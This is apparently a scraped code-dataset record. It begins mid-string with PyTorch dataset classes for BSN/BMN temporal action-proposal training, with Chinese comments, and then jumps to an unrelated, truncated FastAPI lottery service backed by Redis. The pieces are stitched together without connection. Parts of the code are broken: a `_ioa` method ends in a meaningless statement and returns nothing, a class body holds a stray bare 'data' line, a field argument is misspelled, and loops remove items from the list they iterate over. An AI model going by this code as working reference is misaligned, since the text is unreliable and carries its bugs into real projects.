['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('Before check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def __getitem__(self, index):\n video_data, anchor_xmin, anchor_xmax = self._get_base_data(index)\n if self.mode == 'train':\n match_score_action, match_score_start, match_score_end = (self.\n _get_train_label(index, anchor_xmin, anchor_xmax))\n return (video_data, match_score_action, match_score_start,\n match_score_end)\n else:\n return index, video_data, anchor_xmin, anchor_xmax\n\n def _get_base_data(self, index):\n video_name = self.video_list[index]\n anchor_xmin = [(self.temporal_gap * i) for i in range(self.\n temporal_scale)]\n anchor_xmax = [(self.temporal_gap * i) for i in range(1, self.\n temporal_scale + 1)]\n try:\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video_name + '.csv')\n except:\n print('Error in ' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data, anchor_xmin, anchor_xmax\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = np.maximum(self.temporal_gap, self.boundary_ratio *\n gt_lens)\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_action = []\n for jdx in range(len(anchor_xmin)):\n match_score_action.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_xmins, gt_xmaxs)))\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_end_bboxs[:, 0],\n gt_end_bboxs[:, 1])))\n match_score_action = torch.Tensor(match_score_action)\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_action, match_score_start, match_score_end\n\n def _ioa_with_anchors(self, anchors_min, anchors_max, box_min, box_max):\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n def _ioa(self, anchors, gts):\n len_anchors = anchors[:, 1] - anchors[:, 0]\n int_min = np.maximum(anchors[:, 0], gts[:, 0])\n int_max = np.minimum(anchors[:, 1], gts[:, 1])\n np.maximum(np.expand_dims(np.arange(1, 5), 1), np.arange(3))\n\n def __len__(self):\n return len(self.video_list)\n\n\nclass ProposalDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.subset = subset\n self.mode = opt['mode']\n if self.mode == 'train':\n self.top_K = opt['pem_top_K']\n else:\n self.top_K = opt['pem_top_K_inference']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self.feature_path = opt['feature_path']\n self.temporal_scale = opt['temporal_scale']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf = pandas.read_csv('./output/PGM_proposals/' + video_name + '.csv')\n pdf = pdf[:self.top_K]\n video_feature = numpy.load('./output/PGM_feature/' + video_name +\n '.npy')\n video_feature = video_feature[:self.top_K, :]\n video_feature = torch.Tensor(video_feature)\n if self.mode == 'train':\n video_match_iou = torch.Tensor(pdf.match_iou.values[:])\n return video_feature, video_match_iou\n else:\n video_xmin = pdf.xmin.values[:]\n video_xmax = pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return (video_feature, video_xmin, video_xmax, video_xmin_score,\n video_xmax_score)\n\n\ndef load_json(file):\n with open(file) as json_file:\n json_data = json.load(json_file)\n return json_data\n\n\nclass BMN_VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index)\n if self.mode == 'train':\n match_score_start, match_score_end, confidence_score = (self.\n _get_train_label(index, self.anchor_xmin, self.anchor_xmax))\n return (video_data, confidence_score, match_score_start,\n match_score_end)\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx\n for jdx in range(1, self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx\n tmp_match_window.append([xmin, xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map)\n match_map = np.transpose(match_map, [1, 0, 2])\n match_map = np.reshape(match_map, [-1, 2])\n self.match_map = match_map\n self.anchor_xmin = [(self.temporal_gap * (i - 0.5)) for i in range(\n self.temporal_scale)]\n self.anchor_xmax = [(self.temporal_gap * (i + 0.5)) for i in range(\n 1, self.temporal_scale + 1)]\n\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(self.\n temporal_scale) + '/' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors(self.match_map[:, 0], self.\n match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.\n temporal_scale, self.temporal_scale])\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map)\n gt_iou_map = np.max(gt_iou_map, axis=0)\n gt_iou_map = torch.Tensor(gt_iou_map)\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(ioa_with_anchors(anchor_xmin[\n jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(ioa_with_anchors(anchor_xmin[jdx],\n anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_start, match_score_end, gt_iou_map\n\n def __len__(self):\n return len(self.video_list)\n\n\ndef ioa_with_anchors(anchors_min, anchors_max, box_min, box_max):\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n\ndef iou_with_anchors(anchors_min, anchors_max, box_min, box_max):\n \"\"\"Compute jaccard score between a box and the anchors.\n \"\"\"\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n union_len = len_anchors - inter_len + box_max - box_min\n jaccard = np.divide(inter_len, union_len)\n return jaccard\n\n\nif __name__ == '__main__':\n import opts\n opt = opts.parse_opt()\n opt = vars(opt)\n train_loader = torch.utils.data.DataLoader(BMN_VideoDataSet(opt, subset\n ='train'), batch_size=opt['bmn_batch_size'], shuffle=True,\n num_workers=8, pin_memory=True)\n for a, b, c, d in train_loader:\n print(a.shape, b.shape, c.shape, d.shape)\n break\n",
"step-5": "# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport pandas\nimport numpy\nimport json\nimport torch.utils.data as data\nimport os\nimport torch\n\ndef load_json(file):\n with open(file) as json_file:\n data = json.load(json_file)\n return data\n\n\nclass VideoDataSet(data.Dataset):\n def __init__(self,opt,subset=\"train\"):\n self.temporal_scale = opt[\"temporal_scale\"] # 时域长度 归一化到100\n self.temporal_gap = 1. / self.temporal_scale # 每个snippt时间占比\n self.subset = subset # training validation or test\n self.mode = opt[\"mode\"] # 'train' or 'test'\n self.feature_path = opt[\"feature_path\"] # '特征存放位置'\n self.boundary_ratio = opt[\"boundary_ratio\"] # 0.1 人为扩充boundary的区域长度占总长度的比率\n self.video_info_path = opt[\"video_info\"] # 存在视频信息的csv\n self.video_anno_path = opt[\"video_anno\"] # 存放标记信息的csv\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n # 因为某些视频的特征可能不存在,或者遭到了损坏\n for video in self.video_list:\n if not os.path.exists(self.feature_path + \"csv_mean_\" + str(self.temporal_scale) + \"/\" + video + \".csv\"):\n print(\"video :{} feature csv is not existed\".format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n # 删除已知的错误样本\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print(\"del \" + v +' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n\n print (\"After check: csv \\n %s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n \n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database= load_json(self.video_anno_path)\n self.video_dict = {} # 存放一系列内容,包括gt\n for i in range(len(anno_df)):\n video_name=anno_df.video.values[i]\n video_info=anno_database[video_name]\n video_subset=anno_df.subset.values[i] # 读取该视频属于的子数据集 training validation or test\n if self.subset == \"full\": #全部都要\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info # 是需要的数据集样本添加到字典中\n self.video_list = list(self.video_dict.keys()) # 含有哪些video\n print (\"Before check: csv \\n %s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n\n def __getitem__(self, index):\n video_data,anchor_xmin,anchor_xmax = self._get_base_data(index)\n if self.mode == \"train\":\n match_score_action,match_score_start,match_score_end = self._get_train_label(index,anchor_xmin,anchor_xmax)\n return video_data,match_score_action,match_score_start,match_score_end\n else:\n return index,video_data,anchor_xmin,anchor_xmax\n \n def _get_base_data(self,index):\n video_name=self.video_list[index]\n anchor_xmin=[self.temporal_gap*i for i in range(self.temporal_scale)] # 0.00 d到 0.99\n anchor_xmax=[self.temporal_gap*i for i in range(1,self.temporal_scale+1)] # 0.01到1.00\n try:\n video_df=pd.read_csv(self.feature_path+ \"csv_mean_\"+str(self.temporal_scale)+\"/\"+video_name+\".csv\") # 得到这个视频的特征\n except:\n print('Error in '+video_name+\".csv\")\n video_data = video_df.values[:,:]\n video_data = torch.Tensor(video_data) # 这个video的特征[100, 400]\n video_data = torch.transpose(video_data,0,1) #[400, 100] 便于时域的一维卷积操作\n video_data.float()\n return video_data,anchor_xmin,anchor_xmax\n \n def _get_train_label(self,index,anchor_xmin,anchor_xmax): # 相当于要生成3个概率序列的真值\n video_name=self.video_list[index]\n video_info=self.video_dict[video_name] # 包括duration_second duration_frame annotations and feature_frame 但是这个特征长度已经被归一化了\n video_frame=video_info['duration_frame']\n video_second=video_info['duration_second']\n feature_frame=video_info['feature_frame']\n corrected_second=float(feature_frame)/video_frame*video_second #相当于校准时间 因为采用的滑动窗口形式进行提取特征,两个frame会存在一些差异\n video_labels=video_info['annotations']\n \n gt_bbox = []\n for j in range(len(video_labels)): #将时间归一化 0到1之间\n tmp_info=video_labels[j]\n tmp_start=max(min(1,tmp_info['segment'][0]/corrected_second),0)\n tmp_end=max(min(1,tmp_info['segment'][1]/corrected_second),0)\n gt_bbox.append([tmp_start,tmp_end])\n \n gt_bbox=np.array(gt_bbox)\n gt_xmins=gt_bbox[:,0]\n gt_xmaxs=gt_bbox[:,1]\n\n gt_lens=gt_xmaxs-gt_xmins\n gt_len_small=np.maximum(self.temporal_gap,self.boundary_ratio*gt_lens) # starting region 和 ending region的长度\n gt_start_bboxs=np.stack((gt_xmins-gt_len_small/2,gt_xmins+gt_len_small/2),axis=1) # starting region\n gt_end_bboxs=np.stack((gt_xmaxs-gt_len_small/2,gt_xmaxs+gt_len_small/2),axis=1) # ending region\n\n # anchors = np.stack((anchor_xmin, anchor_xmax), 1) # 代表每一个snippet的范围\n match_score_action=[]\n # 给每一个位置计算TEM的三个概率值,但是from 0 to 99 效率不高吧 这种方法生成会有大量的无效操作,特别是gt较少的时候,可以后期优化\n for jdx in range(len(anchor_xmin)):\n match_score_action.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx],anchor_xmax[jdx],gt_xmins,gt_xmaxs)))\n match_score_start=[]\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx],anchor_xmax[jdx],gt_start_bboxs[:,0],gt_start_bboxs[:,1])))\n match_score_end=[]\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx],anchor_xmax[jdx],gt_end_bboxs[:,0],gt_end_bboxs[:,1])))\n match_score_action = torch.Tensor(match_score_action)\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_action,match_score_start,match_score_end #3个长度为100的概率序列\n\n def _ioa_with_anchors(self,anchors_min,anchors_max,box_min,box_max):\n len_anchors=anchors_max-anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n def _ioa(self, anchors, gts):\n len_anchors = anchors[:,1] - anchors[:,0]\n int_min = np.maximum(anchors[:,0],gts[:,0])\n int_max = np.minimum(anchors[:,1],gts[:,1])\n np.maximum(np.expand_dims(np.arange(1, 5), 1), np.arange(3))\n\n\n \n def __len__(self):\n return len(self.video_list)\n\n\nclass ProposalDataSet(data.Dataset):\n def __init__(self,opt,subset=\"train\"):\n \n self.subset=subset\n self.mode = opt[\"mode\"]\n if self.mode == \"train\": # 测试与前推时的样本数量是不一样的\n self.top_K = opt[\"pem_top_K\"]\n else:\n self.top_K = opt[\"pem_top_K_inference\"]\n self.video_info_path = opt[\"video_info\"]\n self.video_anno_path = opt[\"video_anno\"]\n self.feature_path = opt[\"feature_path\"] # '特征存放位置'\n self.temporal_scale = opt[\"temporal_scale\"] # 时域长度 归一化到100\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n # 因为某些视频的特征可能不存在,或者遭到了损坏\n for video in self.video_list:\n if not os.path.exists(self.feature_path + \"csv_mean_\" + str(self.temporal_scale) + \"/\" + video + \".csv\"):\n print(\"video :{} feature csv is not existed\".format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n # 删除已知的错误样本\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print(\"del \" + v +' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n\n print (\"After check: csv \\n %s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n \n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path) #读取信息\n anno_database= load_json(self.video_anno_path) # 读取相关真值信息\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name=anno_df.video.values[i]\n video_info=anno_database[video_name]\n video_subset=anno_df.subset.values[i]\n if self.subset == \"full\":\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print (\"%s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n\n def __len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf=pandas.read_csv(\"./output/PGM_proposals/\"+video_name+\".csv\") # 读取proposal\n pdf=pdf[:self.top_K]\n video_feature = numpy.load(\"./output/PGM_feature/\" + video_name+\".npy\") # read BSP feature for proposals\n video_feature = video_feature[:self.top_K,:]\n #print len(video_feature),len(pdf)\n video_feature = torch.Tensor(video_feature)\n\n if self.mode == \"train\":\n video_match_iou = torch.Tensor(pdf.match_iou.values[:]) # choose IOU as gt 已经在TEM inference阶段计算好\n return video_feature,video_match_iou # [bs, 32] [bs]\n else:\n # 取得proposals的 starting location, ending location, starting score, ending score\n video_xmin =pdf.xmin.values[:]\n video_xmax =pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return video_feature,video_xmin,video_xmax,video_xmin_score,video_xmax_score\n\n\n\ndef load_json(file):\n with open(file) as json_file:\n json_data = json.load(json_file)\n return json_data\n\n\nclass BMN_VideoDataSet(data.Dataset):\n def __init__(self, opt, subset=\"train\"):\n self.temporal_scale = opt[\"temporal_scale\"] # 100\n self.temporal_gap = 1. / self.temporal_scale\n self.subset = subset\n self.mode = opt[\"mode\"]\n self.feature_path = opt[\"feature_path\"]\n self.video_info_path = opt[\"video_info\"]\n self.video_anno_path = opt[\"video_anno\"]\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n # 因为某些视频的特征可能不存在,或者遭到了损坏\n for video in self.video_list:\n if not os.path.exists(self.feature_path + \"csv_mean_\" + str(self.temporal_scale) + \"/\" + video + \".csv\"):\n print(\"video :{} feature csv is not existed\".format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n # 删除已知的错误样本\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print(\"del \" + v +' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n\n print (\"After check: csv \\n %s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print(\"%s subset video numbers: %d\" % (self.subset, len(self.video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index) # video feature [400, 100]\n if self.mode == \"train\":\n # [D, T] [100, 100] [T=100] [T=100]\n match_score_start, match_score_end, confidence_score = self._get_train_label(index, self.anchor_xmin,\n self.anchor_xmax)\n return video_data,confidence_score, match_score_start, match_score_end\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx # start locaiton 归一化之后的\n for jdx in range(1, self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx # ending location 加上duration\n tmp_match_window.append([xmin, xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map) # 100x100x2 最后一个2代表BM map上面每一个代表的candidate proposals所代表的时域范围 [start, duration, 2]\n match_map = np.transpose(match_map, [1, 0, 2]) # [0.00,0.01] [0.01,0.02] [0.02,0.03].....[0.99,0.100] [duration, start, 2]\n match_map = np.reshape(match_map, [-1, 2]) # [0,2] [1,3] [2,4].....[99,101] # duration x start [100*100, 2]\n self.match_map = match_map # duration is same in row, start is same in col\n self.anchor_xmin = [self.temporal_gap * (i-0.5) for i in range(self.temporal_scale)] # 每一个 snippet 的 开始时间\n self.anchor_xmax = [self.temporal_gap * (i+0.5) for i in range(1, self.temporal_scale + 1)] # 每一个 snippet的结束时刻\n # 注意从产生特征的角度来看,上面的anchor min 和anchor max 应该和BSN一样,不减去0.5,\n # 比如第一个特征的就是由0-16帧图片产生,最后一个特征就是-16到-1的图片产生,应该 不用减去那个0.5\n # 之后可以通过实验验证一下是否影响精度 相反,我觉得上面的match map应该加上0,5 因为每个snippet的中央区域在中间 但是因为是离线处理,所以不应该纠结那么多\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + \"csv_mean_\" + str(self.temporal_scale) + \"/\" + video_name + \".csv\")\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second # there are some frames not used\n video_labels = video_info['annotations'] # the measurement is second, not frame\n\n ##############################################################################################\n # change the measurement from second to percentage\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)): #对于每个Proposal\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] / corrected_second), 0) # 归一化时间\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors( # 每一个候选的proposals计算IOU\n self.match_map[:, 0], self.match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map,\n [self.temporal_scale, self.temporal_scale]) # [100, 100] 相当于BM map的label\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map) # [num_gt, 100, 100]\n gt_iou_map = np.max(gt_iou_map, axis=0) # 取最大的IOU作为gt [100, 100]\n gt_iou_map = torch.Tensor(gt_iou_map)\n ##############################################################################################\n\n ####################################################################################################\n # generate R_s and R_e # 构建增强后的start region和ending region\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap # np.maximum(self.temporal_gap, self.boundary_ratio * gt_lens) # 直接用绝对大小代表增强区域的大小\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + gt_len_small / 2), axis=1) # 产生增强之后的两个区域\n #####################################################################################################\n\n ##########################################################################################################\n # calculate the ioa for all timestamp # 计算两个概率序列的真值\n match_score_start = []\n for jdx in range(len(anchor_xmin)): # 针对每一个anchor都计算与gt之间的ioa作为真值\n match_score_start.append(np.max(\n ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0], gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(\n ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n ############################################################################################################\n\n return match_score_start, match_score_end, gt_iou_map # 三个真值 [100], [100], [100,100]\n\n def __len__(self):\n return len(self.video_list)\n\ndef ioa_with_anchors(anchors_min, anchors_max, box_min, box_max):\n # calculate the overlap proportion between the anchor and all bbox for supervise signal,\n # the length of the anchor is 0.01\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n\ndef iou_with_anchors(anchors_min, anchors_max, box_min, box_max):\n \"\"\"Compute jaccard score between a box and the anchors.\n \"\"\"\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.)\n union_len = len_anchors - inter_len + box_max - box_min\n # print inter_len,union_len\n jaccard = np.divide(inter_len, union_len)\n return jaccard\n\nif __name__ == '__main__':\n import opts\n opt = opts.parse_opt()\n opt = vars(opt)\n # test dataset for BMN network\n train_loader = torch.utils.data.DataLoader(BMN_VideoDataSet(opt, subset=\"train\"),\n batch_size=opt[\"bmn_batch_size\"], shuffle=True,\n num_workers=8, pin_memory=True)\n for a,b,c,d in train_loader:\n print(a.shape,b.shape,c.shape,d.shape)\n break",
"step-ids": [
17,
21,
28,
31,
32
]
}
|
[
17,
21,
28,
31,
32
] |
from typing import Optional,List
from fastapi import FastAPI
from pydantic import BaseModel, Field
from redisqueue import RedisQueue,MyRedis
import random
class Award(BaseModel):
name: str
count: int
class Item(BaseModel):
luckname: str = Field(...,title="抽奖规则名称",max_lenght = 300)
total: int = Field(...,title="抽奖总人数",gt=0)
award: Optional[List[Award]] = Field(None,title="奖品列表")
other: str = Field(...,title="参与奖或者未中奖")
app = FastAPI()
class ResSuccess(BaseModel):
ret: int = 0
data
@app.get('/')
def read_root():
return {"Hello":"World"}
@app.post(
'/delect',
tags = ["抽奖接口"],
summary = "删除抽奖规则"
)
def delect(name:str):
rq = RedisQueue(name)
if rq.qsize:
rq.lpop(name)
return {
'ret':0,
'msg':"删除成功"
}
@app.post(
'/creat',
tags = ['抽奖接口'],
summary="创建抽奖规则"
)
def creat(item: Item):
"""
通过该接口可以创建一个抽奖规则
"""
myredis = MyRedis()
rq = RedisQueue(item.luckname)
print("ok")
if rq.qsize():
return {
"ret":500,
"msg":"该抽奖已经存在,请删除后重试"
}
result = {"ret":0, "item":item}
awardlist = item.award
lucklist =[]
luckdict = {}
for ward in awardlist:
